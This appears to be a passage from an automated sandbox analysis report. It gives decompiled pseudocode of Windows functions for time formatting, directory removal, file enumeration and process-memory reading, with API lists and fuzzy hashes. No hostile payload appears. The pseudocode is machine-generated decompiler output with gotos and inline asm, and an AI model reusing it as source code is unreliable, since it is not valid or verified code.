                                                      				_t56 = _a4;
                                                      				_t117 = _a12;
                                                      				_v352 = _t117;
                                                      				if(_a4 != 0) {
                                                      					E4A7430B6(_t56,  &_v360);
                                                      				} else {
                                                      					GetSystemTime( &_v348);
                                                      					SystemTimeToFileTime( &_v348,  &_v360);
                                                      				}
                                                      				FileTimeToLocalFileTime( &_v360,  &_v368);
                                                      				FileTimeToSystemTime( &_v368,  &_v348);
                                                      				if(_a8 != 1) {
                                                      					__eflags =  *0x4a754081;
                                                      					_t103 = 2;
                                                      					if( *0x4a754081 == 0) {
                                                      						__eflags =  *0x4a754090;
                                                      						_t64 = _v340 & 0x0000ffff;
                                                      						_t116 = 0x4a754bc0;
                                                      						if( *0x4a754090 == 0) {
                                                      							_t116 = E4A7325B8;
                                                      						} else {
                                                      							_t109 = 0xc;
                                                      							__eflags = _t64 - _t109;
                                                      							if(__eflags < 0) {
                                                      								__eflags = _t64;
                                                      								if(_t64 == 0) {
                                                      									_t64 = _t109;
                                                      								}
                                                      							} else {
                                                      								if(__eflags > 0) {
                                                      									__eflags = _t64;
                                                      								}
                                                      								_t116 = 0x4a754b80;
                                                      							}
                                                      						}
                                                      						_push(_t116);
                                                      						_push(_v338 & 0x0000ffff);
                                                      						_push(0x4a754950);
                                                      						E4A73179D( &_v72, 0x20, L"%02d%s%02d%s", _t64);
                                                      						L26:
                                                      						_push( &_v72);
                                                      						__eflags = _t117;
                                                      						if(_t117 == 0) {
                                                      							_t68 = E4A73C5A0();
                                                      							goto L7;
                                                      						}
                                                      						_push(_a16);
                                                      						_push(_t117);
                                                      						E4A73185A();
                                                      						_t71 = _t117;
                                                      						_t116 = _t71 + 2;
                                                      						do {
                                                      							_t108 =  *_t71;
                                                      							_t71 = _t71 + _t103;
                                                      							__eflags = _t108;
                                                      						} while (_t108 != 0);
                                                      						goto L6;
                                                      					}
                                                      					_v332 = _v332 & 0x00000000;
                                                      					_push(_t119);
                                                      					_t34 = _t103 + 0x7e; // 0x80
                                                      					_t120 = _t34;
                                                      					_t75 = GetLocaleInfoW(E4A73756D(), 0x1003,  &_v328, _t34);
                                                      					__eflags = _t75;
                                                      					if(_t75 == 0) {
                                                      						E4A73185A( &_v328, _t120, L"HH:mm:ss t");
                                                      					}
                                                      					__eflags = _v328;
                                                      					_t121 =  &_v328;
                                                      					if(_v328 != 0) {
                                                      						do {
                                                      							_t118 =  *_t121 & 0x0000ffff;
                                                      							__eflags = _t118 - 0x27;
                                                      							if(_t118 == 0x27) {
                                                      								__eflags = _v332;
                                                      								_v332 = 0 | _v332 == 0x00000000;
                                                      								L10:
                                                      								_t121 = _t121 + _t103;
                                                      								__eflags = _t121;
                                                      								goto L11;
                                                      							}
                                                      							__eflags = _v332;
                                                      							if(_v332 != 0) {
                                                      								goto L10;
                                                      							}
                                                      							__eflags = _t118 - 0x68;
                                                      							if(_t118 == 0x68) {
                                                      								L17:
                                                      								_t85 = 0;
                                                      								__eflags = 0;
                                                      								do {
                                                      									_t121 = _t121 + _t103;
                                                      									_t85 = _t85 + 1;
                                                      									__eflags =  *_t121 - _t118;
                                                      								} while ( *_t121 == _t118);
                                                      								_t121 = _t121 +  ~_t85 * 2;
                                                      								__eflags = _t85 - 1;
                                                      								if(_t85 != 1) {
                                                      									goto L10;
                                                      								}
                                                      								_t86 = _t121;
                                                      								_t30 = _t86 + 2; // 0x2
                                                      								_t116 = _t30;
                                                      								goto L8;
                                                      								L8:
                                                      								_t112 =  *_t86;
                                                      								_t86 = _t86 + _t103;
                                                      								__eflags = _t112;
                                                      								if(_t112 != 0) {
                                                      									goto L8;
                                                      								} else {
                                                      									_t87 = _t86 - _t116;
                                                      									__eflags = _t87;
                                                      									_t26 = _t121 + 2; // 0x2
                                                      									memmove(_t26, _t121, (_t87 >> 1) + (_t87 >> 1) + 2);
                                                      									_t123 = _t123 + 0xc;
                                                      									 *_t121 = _t118;
                                                      									goto L10;
                                                      								}
                                                      							}
                                                      							__eflags = _t118 - 0x48;
                                                      							if(_t118 == 0x48) {
                                                      								goto L17;
                                                      							}
                                                      							__eflags = _t118 - 0x6d;
                                                      							if(_t118 != 0x6d) {
                                                      								goto L11;
                                                      							}
                                                      							goto L17;
                                                      							L11:
                                                      							_t121 = _t121 + _t103;
                                                      							__eflags =  *_t121;
                                                      						} while ( *_t121 != 0);
                                                      						_t117 = _v352;
                                                      						goto L25;
                                                      					} else {
                                                      						L25:
                                                      						_t84 = GetTimeFormatW(E4A73756D(), _t103,  &_v348,  &_v328,  &_v72, 0x20);
                                                      						_pop(_t119);
                                                      						__eflags = _t84;
                                                      						if(_t84 == 0) {
                                                      							_v72 = _t84;
                                                      						}
                                                      						goto L26;
                                                      					}
                                                      				} else {
                                                      					_t92 = _v334 & 0x0000ffff;
                                                      					_t113 = 0xa;
                                                      					asm("cdq");
                                                      					_t116 = _t92 % _t113;
                                                      					_push(_t92 / _t113);
                                                      					_push(0x4a754930);
                                                      					_push(_v336 & 0x0000ffff);
                                                      					_push(0x4a754950);
                                                      					_push(_v338 & 0x0000ffff);
                                                      					_push(0x4a754950);
                                                      					_push(_v340 & 0x0000ffff);
                                                      					_push(L"%2d%s%02d%s%02d%s%02d");
                                                      					if(_t117 == 0) {
                                                      						_t68 = E4A7358F3();
                                                      						goto L7;
                                                      					} else {
                                                      						_push(_a16);
                                                      						_push(_t117);
                                                      						E4A73179D();
                                                      						_t98 = _t117;
                                                      						_t116 = _t98 + 2;
                                                      						_t103 = 2;
                                                      						do {
                                                      							_t115 =  *_t98;
                                                      							_t98 = _t98 + _t103;
                                                      						} while (_t115 != 0);
                                                      						L6:
                                                      						_t68 = _t71 - _t116 >> 1;
                                                      						L7:
                                                      						return E4A7313A9(_t68, _t103, _v8 ^ _t122, _t116, _t117, _t119);
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      • GetSystemTime.KERNEL32(?,00002000,75A9A9E9), ref: 4A73D733
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 4A73D747
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 4A73D75B
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 4A73D76F
                                                      • GetLocaleInfoW.KERNEL32(00000000,00001003,?,00000080,4A760640), ref: 4A742B0B
                                                      • GetTimeFormatW.KERNEL32(00000000,00000002,?,00000000,?,00000020), ref: 4A742B48
                                                        • Part of subcall function 4A73179D: _vsnwprintf.MSVCRT ref: 4A7317CB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Time$File$System$FormatInfoLocalLocale_vsnwprintf
                                                      • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                                      • API String ID: 1064561440-2516506544
                                                      • Opcode ID: 309928b15440b0c3b5ca065317d301cef4a4013369705eb13c0e4935a27ce225
                                                      • Instruction ID: 071060c7e7338dac48e1251f19a78e0b6abc404350eb0e29b1875a92ffd8ab04
                                                      • Opcode Fuzzy Hash: 309928b15440b0c3b5ca065317d301cef4a4013369705eb13c0e4935a27ce225
                                                      • Instruction Fuzzy Hash: 7471B972905219EADB708FA0CC44BEB7BBDEB48341F024495E909DB151E7749E8CCBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E4A750202(void* __ebx, void* __edi, WCHAR* _a4) {
                                                      				signed int _v8;
                                                      				short _v12;
                                                      				short _v14;
                                                      				short _v16;
                                                      				signed int _v20;
                                                      				WCHAR* _v24;
                                                      				void* __esi;
                                                      				signed int _t17;
                                                      				signed int _t23;
                                                      				long _t25;
                                                      				signed int _t26;
                                                      				void* _t31;
                                                      				void* _t35;
                                                      				void* _t36;
                                                      				WCHAR* _t38;
                                                      				signed int _t39;
                                                      
                                                      				_t36 = __edi;
                                                      				_t31 = __ebx;
                                                      				_t17 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t17 ^ _t39;
                                                      				_v20 = _v20 & 0x00000000;
                                                      				_t38 = _a4;
                                                      				if(GetFullPathNameW(_t38, 4,  &_v16,  &_v24) != 3 || _v14 != 0x3a || _v12 != 0x5c) {
                                                      					_push(_t31);
                                                      					if(RemoveDirectoryW(_t38) == 0) {
                                                      						_push(_t36);
                                                      						_t25 = GetLastError();
                                                      						_v20 = _t25;
                                                      						if(_t25 == 5) {
                                                      							_t26 = GetFileAttributesW(_t38);
                                                      							if(_t26 != 0xffffffff && (_t26 & 0x00000001) != 0 && SetFileAttributesW(_t38, _t26 & 0xfffffffe) != 0) {
                                                      								if(RemoveDirectoryW(_t38) == 0) {
                                                      									_v20 = GetLastError();
                                                      								} else {
                                                      									_v20 = _v20 & 0x00000000;
                                                      								}
                                                      							}
                                                      						}
                                                      						_pop(_t36);
                                                      					}
                                                      					_t23 = _v20;
                                                      					_pop(_t31);
                                                      				} else {
                                                      					_t23 = 0;
                                                      				}
                                                      				return E4A7313A9(_t23, _t31, _v8 ^ _t39, _t35, _t36, _t38);
                                                      			}




















                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(4A7508D8,00000004,?,?,74EC43D5), ref: 4A750227
                                                      • RemoveDirectoryW.KERNEL32(4A7508D8,?), ref: 4A75024C
                                                      • GetLastError.KERNEL32(00000104), ref: 4A750259
                                                      • GetFileAttributesW.KERNEL32(4A7508D8), ref: 4A750264
                                                      • SetFileAttributesW.KERNEL32(4A7508D8,00000000), ref: 4A750278
                                                      • RemoveDirectoryW.KERNEL32(4A7508D8), ref: 4A750283
                                                      • GetLastError.KERNEL32 ref: 4A75028F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: AttributesDirectoryErrorFileLastRemove$FullNamePath
                                                      • String ID: :$\
                                                      • API String ID: 4091459551-1166558509
                                                      • Opcode ID: e47223b2f084d78b91a958f08a03fe0c9685469d00ba813d63dbb5dc01965c36
                                                      • Instruction ID: 514d99d473cdf6c1bacf4c19813d1ced8f1aacebeeb71eb6578b475d06e0da13
                                                      • Opcode Fuzzy Hash: e47223b2f084d78b91a958f08a03fe0c9685469d00ba813d63dbb5dc01965c36
                                                      • Instruction Fuzzy Hash: 4D113B72905219AFEB60DFA4CC41ADEBBFCAF06265F010515E415E3840D770CA4AC768
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E4A732E73(void* __ecx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void** _a24) {
                                                      				void* _v5;
                                                      				void* _t22;
                                                      				void* _t23;
                                                      				void* _t24;
                                                      				void* _t26;
                                                      				void* _t28;
                                                      				signed int _t38;
                                                      				signed int _t40;
                                                      				void** _t45;
                                                      
                                                      				_v5 = 0;
                                                      				_t22 = FindFirstFileExW(_a8, 0 | _a16 == 0x00000000, _a20, 0, 0, 2);
                                                      				_t45 = _a24;
                                                      				 *_t45 = _t22;
                                                      				if(_t22 != 0xffffffff) {
                                                      					while(1) {
                                                      						_t23 = _a4(_a20, _a12);
                                                      						__eflags = _t23;
                                                      						if(_t23 != 0) {
                                                      							break;
                                                      						}
                                                      						_t24 = FindNextFileW( *_t45, _a20);
                                                      						__eflags = _t24;
                                                      						if(_t24 == 0) {
                                                      							FindClose( *_t45);
                                                      							 *_t45 =  *_t45 | 0xffffffff;
                                                      							L6:
                                                      							__eflags =  *_t45 - 0xffffffff;
                                                      							if( *_t45 == 0xffffffff) {
                                                      								L12:
                                                      								__eflags = _v5;
                                                      								if(_v5 != 0) {
                                                      									L2:
                                                      									_t26 = _v5;
                                                      									L3:
                                                      									return _t26;
                                                      								}
                                                      								goto L1;
                                                      							}
                                                      							_t28 =  *0x4a75412c; // 0x0
                                                      							__eflags = _t28;
                                                      							if(_t28 == 0) {
                                                      								_t28 = HeapAlloc(GetProcessHeap(), 0, 0x14);
                                                      								L14:
                                                      								 *0x4a75412c = _t28;
                                                      								L9:
                                                      								__eflags = _t28;
                                                      								if(_t28 != 0) {
                                                      									_t40 =  *0x4a754134; // 0x0
                                                      									 *(_t28 + _t40 * 4) =  *_t45;
                                                      									 *0x4a754134 =  *0x4a754134 + 1;
                                                      									__eflags =  *0x4a754134;
                                                      								}
                                                      								_v5 = 1;
                                                      								goto L12;
                                                      							}
                                                      							_t38 =  *0x4a754134; // 0x0
                                                      							__eflags = _t38 -  *0x4a754130; // 0x0
                                                      							if(__eflags >= 0) {
                                                      								_t28 = HeapReAlloc(GetProcessHeap(), 0, _t28, 4 + _t38 * 4);
                                                      								__eflags = _t28;
                                                      								if(_t28 == 0) {
                                                      									 *0x4a754128 = GetLastError();
                                                      									FindClose( *_t45);
                                                      									 *_t45 =  *_t45 | 0xffffffff;
                                                      									_t26 = 0;
                                                      									goto L3;
                                                      								}
                                                      								 *0x4a754130 =  *0x4a754130 + 1;
                                                      								goto L14;
                                                      							}
                                                      							goto L9;
                                                      						}
                                                      						__eflags =  *_t45 - 0xffffffff;
                                                      						if( *_t45 != 0xffffffff) {
                                                      							continue;
                                                      						}
                                                      						goto L6;
                                                      					}
                                                      					 *0x4a754128 = 0;
                                                      					_v5 = 1;
                                                      					goto L6;
                                                      				}
                                                      				L1:
                                                      				 *0x4a754128 = GetLastError();
                                                      				goto L2;
                                                      			}













                                                      APIs
                                                      • FindFirstFileExW.KERNEL32(00000004,00000000,?,00000000,00000000,00000002,00000000,00000000,00000000,?,?,4A739D97,4A739D6F,?,00000000,4A739BCF), ref: 4A732E94
                                                      • GetLastError.KERNEL32(?,4A739D97,4A739D6F,?,00000000,4A739BCF,00000004,?,?,4A739BCF,?,00000004,?,00000000), ref: 4A732EA4
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ErrorFileFindFirstLast
                                                      • String ID:
                                                      • API String ID: 873889042-0
                                                      • Opcode ID: 10301a0f06b4eb0afa221941b10a6243e1d72101c89b7587f485211b6af640b4
                                                      • Instruction ID: 0a10856cf0f1a42260938161c60bdb7e408480dd4c2e155e4c5422c0b26ce2a7
                                                      • Opcode Fuzzy Hash: 10301a0f06b4eb0afa221941b10a6243e1d72101c89b7587f485211b6af640b4
                                                      • Instruction Fuzzy Hash: 903126B1589206EFDF708FA0C84A9997F7DFF26362B124628E691C2992C7318C49CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A74D539() {
                                                      				intOrPtr _v8;
                                                      				struct HINSTANCE__* _t4;
                                                      				void* _t7;
                                                      				signed int _t10;
                                                      
                                                      				_v8 = 0;
                                                      				_t10 =  *0x4a77092c; // 0x0
                                                      				if(_t10 != 0) {
                                                      				}
                                                      				_t4 = LoadLibraryW(L"NTDLL.DLL");
                                                      				 *0x4a77092c = _t4;
                                                      				if(_t4 == 0) {
                                                      					 *0x4a77092c =  *0x4a77092c | 0xffffffff;
                                                      					goto ( *((intOrPtr*)(_t7 +  &M4A770928)));
                                                      					goto L5;
                                                      				}
                                                      				M4A770928 = GetProcAddress(_t4, "NtQueryInformationProcess");
                                                      				goto L5;
                                                      			}








                                                      APIs
                                                      • LoadLibraryW.KERNEL32(NTDLL.DLL,00000000), ref: 4A74D557
                                                      • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 4A74D56C
                                                      • ReadProcessMemory.KERNEL32(00000001,?,?,00000248,?,?), ref: 4A74D5C3
                                                      • ReadProcessMemory.KERNEL32(00000001,?,00000001,00000004,00000000), ref: 4A74D5FE
                                                      • ReadProcessMemory.KERNEL32(00000001,00000000,00000001,00000002,00000000), ref: 4A74D61A
                                                      • ReadProcessMemory.KERNEL32(00000001,00000000,?,00000002,00000000), ref: 4A74D642
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                      • API String ID: 1580871199-2613899276
                                                      • Opcode ID: 7655f76802456e9bbe0b457a2f442e2f5561efc422025ed5dbb4323d04d9f866
                                                      • Instruction ID: 2aa7139313c46f0908f4574134bec5a14e6cabfcd1111ad95ab2ff6e3cd7b8d0
                                                      • Opcode Fuzzy Hash: 7655f76802456e9bbe0b457a2f442e2f5561efc422025ed5dbb4323d04d9f866
                                                      • Instruction Fuzzy Hash: 4531CFB5905209BBEB20DFA4CC99DBEBBBCAB45284F018069F945D2141D730EE45CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 66%
                                                      			E4A73BBA4(void* __edi, WCHAR* _a4, intOrPtr _a8, signed int* _a12) {
                                                      				signed int _v8;
                                                      				char _v528;
                                                      				struct _WIN32_FIND_DATAW _v1120;
                                                      				void* _v1124;
                                                      				signed int _v1128;
                                                      				char _v1132;
                                                      				WCHAR* _v1136;
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				signed int _t52;
                                                      				WCHAR* _t54;
                                                      				short _t59;
                                                      				WCHAR* _t61;
                                                      				signed int _t65;
                                                      				signed char _t66;
                                                      				WCHAR* _t69;
                                                      				WCHAR* _t73;
                                                      				void* _t75;
                                                      				intOrPtr* _t76;
                                                      				intOrPtr* _t83;
                                                      				intOrPtr* _t84;
                                                      				intOrPtr* _t88;
                                                      				intOrPtr* _t92;
                                                      				signed int _t95;
                                                      				intOrPtr* _t98;
                                                      				signed int* _t111;
                                                      				short _t112;
                                                      				short _t115;
                                                      				short _t118;
                                                      				short _t119;
                                                      				short _t120;
                                                      				intOrPtr _t124;
                                                      				intOrPtr _t125;
                                                      				short _t127;
                                                      				short* _t128;
                                                      				void* _t129;
                                                      				int _t131;
                                                      				WCHAR* _t132;
                                                      				signed int _t134;
                                                      
                                                      				_t129 = __edi;
                                                      				_t52 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t52 ^ _t134;
                                                      				_t111 = _a12;
                                                      				_t132 = _a4;
                                                      				_t54 = _t132;
                                                      				_v1136 = _t132;
                                                      				_t5 =  &(_t54[1]); // 0x2
                                                      				_t128 = _t5;
                                                      				do {
                                                      					_t112 =  *_t54;
                                                      					_t54 =  &(_t54[1]);
                                                      				} while (_t112 != 0);
                                                      				if((_t54 - _t128 >> 1) + 2 > _a8) {
                                                      					L9:
                                                      					_t59 = 0;
                                                      					L8:
                                                      					return E4A7313A9(_t59, _t111, _v8 ^ _t134, _t128, _t129, _t132);
                                                      				}
                                                      				_t61 = _t132;
                                                      				_t7 =  &(_t61[1]); // 0x2
                                                      				_t128 = _t7;
                                                      				do {
                                                      					_t115 =  *_t61;
                                                      					_t61 =  &(_t61[1]);
                                                      				} while (_t115 != 0);
                                                      				_t65 = (_t61 - _t128 >> 1) + 0xfffffffe;
                                                      				_v1128 = _t65;
                                                      				 *_t111 = _t65;
                                                      				_t66 = GetFileAttributesW(_t132);
                                                      				if(_t66 == 0xffffffff) {
                                                      					_push(0);
                                                      					_push(GetLastError());
                                                      					E4A736D44(_t115);
                                                      					goto L9;
                                                      				}
                                                      				if((_t66 & 0x00000010) != 0) {
                                                      					_t69 = _t132;
                                                      					_t12 =  &(_t69[1]); // 0x2
                                                      					_t128 = _t12;
                                                      					do {
                                                      						_t118 =  *_t69;
                                                      						_t69 =  &(_t69[1]);
                                                      					} while (_t118 != 0);
                                                      					_t73 =  &(_t132[_t69 - _t128 >> 1]);
                                                      					if( *((short*)(_t73 - 2)) != 0x5c) {
                                                      						_t119 = 0x5c;
                                                      						 *_t73 = _t119;
                                                      						_t120 = 0x2a;
                                                      						_t73[1] = _t120;
                                                      						_t121 = 0;
                                                      						_t73[2] = 0;
                                                      					} else {
                                                      						_t127 = 0x2a;
                                                      						 *_t73 = _t127;
                                                      						_t121 = 0;
                                                      						_t73[1] = 0;
                                                      					}
                                                      					_t75 = FindFirstFileW(_t132,  &_v1120);
                                                      					_v1124 = _t75;
                                                      					if(_t75 != 0xffffffff) {
                                                      						_push(_t129);
                                                      						_t131 = 1;
                                                      						do {
                                                      							_t121 = E4A732EC4;
                                                      							_t76 =  &(_v1120.cFileName);
                                                      							while(1) {
                                                      								_t128 =  *_t76;
                                                      								if(_t128 !=  *_t121) {
                                                      									break;
                                                      								}
                                                      								if(_t128 == 0) {
                                                      									L25:
                                                      									_t76 = 0;
                                                      									L27:
                                                      									if(_t76 == 0) {
                                                      										goto L53;
                                                      									}
                                                      									_t121 = E4A732EBC;
                                                      									_t83 =  &(_v1120.cFileName);
                                                      									while(1) {
                                                      										_t128 =  *_t83;
                                                      										if(_t128 !=  *_t121) {
                                                      											break;
                                                      										}
                                                      										if(_t128 == 0) {
                                                      											L33:
                                                      											_t83 = 0;
                                                      											L35:
                                                      											if(_t83 == 0) {
                                                      												goto L53;
                                                      											}
                                                      											_t84 =  &(_v1120.cFileName);
                                                      											_t128 = _t84 + 2;
                                                      											do {
                                                      												_t121 =  *_t84;
                                                      												_t84 = _t84 + 2;
                                                      											} while (_t121 != 0);
                                                      											if(_t84 == _t128) {
                                                      												goto L53;
                                                      											}
                                                      											if((_v1120.dwFileAttributes & 0x00000010) != 0) {
                                                      												_t88 =  &(_v1120.cFileName);
                                                      												_t128 = _t88 + 2;
                                                      												do {
                                                      													_t124 =  *_t88;
                                                      													_t88 = _t88 + 2;
                                                      												} while (_t124 != 0);
                                                      												_t121 =  *_t111;
                                                      												if(_t121 <= _t88 - _t128 >> 1) {
                                                      													_t92 =  &(_v1120.cFileName);
                                                      													_t128 = _t92 + 2;
                                                      													do {
                                                      														_t121 =  *_t92;
                                                      														_t92 = _t92 + 2;
                                                      													} while (_t121 != 0);
                                                      													_t95 = _t92 - _t128 >> 1;
                                                      													L52:
                                                      													 *_t111 = _t95;
                                                      													goto L53;
                                                      												}
                                                      												L48:
                                                      												_t95 = _t121;
                                                      												goto L52;
                                                      											}
                                                      											E4A73185A( &_v528, 0x104, _v1136);
                                                      											_t98 =  &_v528;
                                                      											_t128 = _t98 + 2;
                                                      											do {
                                                      												_t125 =  *_t98;
                                                      												_t98 = _t98 + 2;
                                                      											} while (_t125 != 0);
                                                      											_t121 = 0;
                                                      											 *((short*)(_t134 + (_t98 - _t128 >> 1) * 2 - 0x20e)) = 0;
                                                      											E4A7320A9(0x104,  &_v528, 0x104,  &(_v1120.cFileName));
                                                      											if(E4A73BBA4(_t131,  &_v528, 0x104,  &_v1132) == 0) {
                                                      												goto L54;
                                                      											}
                                                      											_t95 = _v1132 + _v1128;
                                                      											_t121 =  *_t111;
                                                      											if(_t121 > _t95) {
                                                      												goto L48;
                                                      											}
                                                      											goto L52;
                                                      										}
                                                      										_t128 =  *((intOrPtr*)(_t83 + 2));
                                                      										_t26 = _t121 + 2; // 0x2e
                                                      										if(_t128 !=  *_t26) {
                                                      											break;
                                                      										}
                                                      										_t83 = _t83 + 4;
                                                      										_t121 = _t121 + 4;
                                                      										if(_t128 != 0) {
                                                      											continue;
                                                      										}
                                                      										goto L33;
                                                      									}
                                                      									asm("sbb eax, eax");
                                                      									asm("sbb eax, 0xffffffff");
                                                      									goto L35;
                                                      								}
                                                      								_t128 =  *((intOrPtr*)(_t76 + 2));
                                                      								_t23 = _t121 + 2; // 0x5c0000
                                                      								if(_t128 !=  *_t23) {
                                                      									break;
                                                      								}
                                                      								_t76 = _t76 + 4;
                                                      								_t121 = _t121 + 4;
                                                      								if(_t128 != 0) {
                                                      									continue;
                                                      								}
                                                      								goto L25;
                                                      							}
                                                      							asm("sbb eax, eax");
                                                      							asm("sbb eax, 0xffffffff");
                                                      							goto L27;
                                                      							L53:
                                                      							_t131 = FindNextFileW(_v1124,  &_v1120);
                                                      						} while (_t131 != 0);
                                                      						L54:
                                                      						_t132 = GetLastError();
                                                      						FindClose(_v1124);
                                                      						_pop(_t129);
                                                      						if(_t131 != 0) {
                                                      							goto L9;
                                                      						}
                                                      						L55:
                                                      						if(_t132 == 0x12) {
                                                      							goto L7;
                                                      						}
                                                      						_push(0);
                                                      						_push(_t132);
                                                      						E4A736D44(_t121);
                                                      						_t59 = 0;
                                                      						goto L8;
                                                      					}
                                                      					_t132 = GetLastError();
                                                      					FindClose(0xffffffff);
                                                      					if(_t132 == 2) {
                                                      						goto L7;
                                                      					}
                                                      					goto L55;
                                                      				}
                                                      				L7:
                                                      				_t59 = 1;
                                                      				goto L8;
                                                      			}
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(00000000,00000104,?), ref: 4A73BC05
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: f0da9787de8d883325144ea77801a7c01f65e5c01ab40dbfbbe1d7f8c920fbdc
                                                      • Instruction ID: 4c605f48072a1a10ec04cd3cdf3cf7983a04e5b1edadb7bae9966c1d1e532bcb
                                                      • Opcode Fuzzy Hash: f0da9787de8d883325144ea77801a7c01f65e5c01ab40dbfbbe1d7f8c920fbdc
                                                      • Instruction Fuzzy Hash: B28166735192179BCB749F64CC49AE67BB8EF49324F0286A4E916CB191FB30DE48CB44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 57%
                                                      			E4A736E47(WCHAR* _a4, intOrPtr _a8, signed int _a12) {
                                                      				signed int _v8;
                                                      				struct _WIN32_FIND_DATAW _v600;
                                                      				void* _v604;
                                                      				void* _v608;
                                                      				signed int _v612;
                                                      				WCHAR* _v616;
                                                      				void _v620;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t47;
                                                      				void* _t52;
                                                      				void* _t54;
                                                      				void* _t57;
                                                      				signed int _t60;
                                                      				signed int _t61;
                                                      				signed int _t72;
                                                      				signed int _t74;
                                                      				void _t75;
                                                      				signed int _t76;
                                                      				void* _t77;
                                                      				signed int _t78;
                                                      				signed int _t83;
                                                      				void* _t86;
                                                      				short* _t94;
                                                      				WCHAR* _t95;
                                                      				void* _t96;
                                                      				void* _t97;
                                                      				int _t98;
                                                      				void* _t99;
                                                      				void* _t101;
                                                      				void* _t103;
                                                      				signed int _t104;
                                                      				void* _t105;
                                                      
                                                      				_t47 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t47 ^ _t104;
                                                      				_t95 = _a4;
                                                      				_v616 = _t95;
                                                      				_t94 =  &(_t95[1]);
                                                      				do {
                                                      					__cx =  *__eax;
                                                      					__eax = __eax + 1;
                                                      					__eax = __eax + 1;
                                                      					__eflags = __cx;
                                                      				} while (__cx != 0);
                                                      				__eax = __eax - __edx;
                                                      				__eax = __eax >> 1;
                                                      				__eflags = __eax - _a8;
                                                      				_v612 = __eax;
                                                      				if(__eax > _a8) {
                                                      					__eax = 0;
                                                      				} else {
                                                      					_push(__esi);
                                                      					__esi = __edi + 6;
                                                      					_v604 = __esi;
                                                      					_push(__ebx);
                                                      					do {
                                                      						_t75 =  *_t99 & 0x0000ffff;
                                                      						_v620 = _t75;
                                                      						__eflags = _t75;
                                                      						if(_t75 == 0) {
                                                      							L13:
                                                      							 *_t99 = 0;
                                                      							_t52 = FindFirstFileW(_t95,  &_v600);
                                                      							 *_t99 = _t75;
                                                      							__eflags = _t52 - 0xffffffff;
                                                      							if(_t52 == 0xffffffff) {
                                                      								_t101 = _t99 + 2;
                                                      								_v604 = _t101;
                                                      								goto L9;
                                                      							} else {
                                                      								FindClose(_t52);
                                                      								__eflags = _v600.cAlternateFileName;
                                                      								if(_v600.cAlternateFileName != 0) {
                                                      									__eflags = _a12;
                                                      									if(_a12 != 0) {
                                                      										L2:
                                                      										_t57 =  &(_v600.cAlternateFileName);
                                                      										goto L16;
                                                      									} else {
                                                      										_t72 =  &(_v600.cAlternateFileName);
                                                      										__imp___wcsnicmp(_t72, _v604, _t99 - _v604 >> 1);
                                                      										_t105 = _t105 + 0xc;
                                                      										__eflags = _t72;
                                                      										if(_t72 != 0) {
                                                      											goto L15;
                                                      										} else {
                                                      											_t74 =  &(_v600.cFileName);
                                                      											__imp___wcsicmp(_t74,  &(_v600.cAlternateFileName));
                                                      											__eflags = _t74;
                                                      											if(_t74 != 0) {
                                                      												goto L2;
                                                      											} else {
                                                      												goto L15;
                                                      											}
                                                      										}
                                                      									}
                                                      									L18:
                                                      									_t60 = _t57 - _t94 >> 1;
                                                      									_t76 = _t60;
                                                      									_t61 = _t60 - (_t99 - _v604 >> 1);
                                                      									_t83 = _v612 + _t61;
                                                      									__eflags = _t83 - _a8;
                                                      									if(_t83 >= _a8) {
                                                      										_t54 = 0;
                                                      										goto L11;
                                                      									} else {
                                                      										_v612 = _t83;
                                                      										__eflags = _t61;
                                                      										if(_t61 > 0) {
                                                      											_t86 = _t99;
                                                      											_t96 = _t86 + 2;
                                                      											do {
                                                      												_t94 =  *_t86;
                                                      												_t86 = _t86 + 2;
                                                      												__eflags = _t94;
                                                      											} while (_t94 != 0);
